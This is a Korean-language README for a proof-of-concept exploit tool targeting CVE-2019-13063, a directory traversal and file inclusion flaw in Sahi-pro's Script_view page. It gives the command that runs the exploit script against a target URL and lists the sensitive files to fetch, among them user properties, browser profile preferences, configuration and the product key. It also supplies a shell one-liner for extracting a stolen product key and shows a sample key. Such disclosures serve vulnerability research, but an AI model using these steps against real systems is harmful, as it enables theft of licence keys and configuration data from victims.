
Sahi-pro 웹 애플리케이션 CVE-2019-13063에 존재하는 디렉터리 트래버설 및 로컬 파일 포함 취약점을 악용하기 위한 개념 증명 도구
Sahi-pro 스크립트 관리자 웹 애플리케이션에서 문제가 발견되었습니다. Sahi-pro 웹 애플리케이션의 /Script_view 페이지에 있는 ?script= 매개변수에 파일 및 디렉터리 트래버설 취약점이 존재합니다. 공격자는 특수하게 조작된 URL을 전송하여 피해자로부터 민감한 파일을 검색하고 탈취할 수 있습니다.
이것은 Sahi-pro 웹 애플리케이션에 존재하는 디렉터리 트래버설 및 파일 트래버설 취약점을 악용하기 위한 개념 증명 도구입니다.
영향: Sahi-pro 웹 애플리케이션 소프트웨어에는 디렉터리 및 파일 트래버설 취약점이 있어 애플리케이션의 민감한 정보가 유출되거나 직접 시스템 파일을 가져오는 데 사용될 수 있습니다.
script_view 페이지의 ?script= 매개변수는 파일 및 디렉터리 트래버설에 취약하여 파일 내용을 나열할 수 있습니다.
다음과 같이 실행합니다:
$ python3 CVE-2019-13063-POC.py --url http://example:[REDACTED]
이것은 애플리케이션의 제품 키를 다운로드합니다.
취약한 ?script= 매개변수에 다운로드하려는 파일을 추가하여 전체 URL을 지정합니다.
usage: CVE-2019-13063-POC.py [-h] [--url URL]
optional arguments:
-h, --help show this help message and exit
--url URL Specify the vulnerable URL
Sahi User properties file - \sahi_pro\userdata\config\userdata.properties
Sahi data profile - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
Sahi properties file - \sahi_pro\config\sahi.properties
Sahi Product key location - \config\productkey.txt
이 스크립트는 전체 페이지를 다운로드하려고 시도할 뿐이며, 고유한 <ol><li> HTML 매개변수 사이에 있기 때문에 간단한 bash 한 줄 명령으로 페이지에서 원하는 내용을 쉽게 추출할 수 있습니다.
제품 키를 추출하는 예:
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1
1a79a4d60de6718e8e5b326e338ae533